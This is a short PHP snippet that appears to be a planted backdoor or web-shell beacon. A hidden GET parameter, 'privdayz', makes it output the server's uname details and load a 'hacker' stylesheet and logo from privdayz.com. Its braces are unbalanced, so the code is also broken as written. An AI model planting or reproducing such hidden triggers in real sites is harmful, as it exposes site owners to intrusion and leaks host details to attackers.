<?php
if ( isset($_GET['privdayz']) )
{
	echo '<link href="https://privdayz.com/wp-content/themes/privdaysv1/hacker.css" rel="stylesheet">
<center><img src="https://cdn.privdayz.com/images/logo.jpg" referrerpolicy="unsafe-url" /></center><b>'.php_uname().'<br></b><b><br><br>'.''.'<br></b>';

	}
exit;
}?>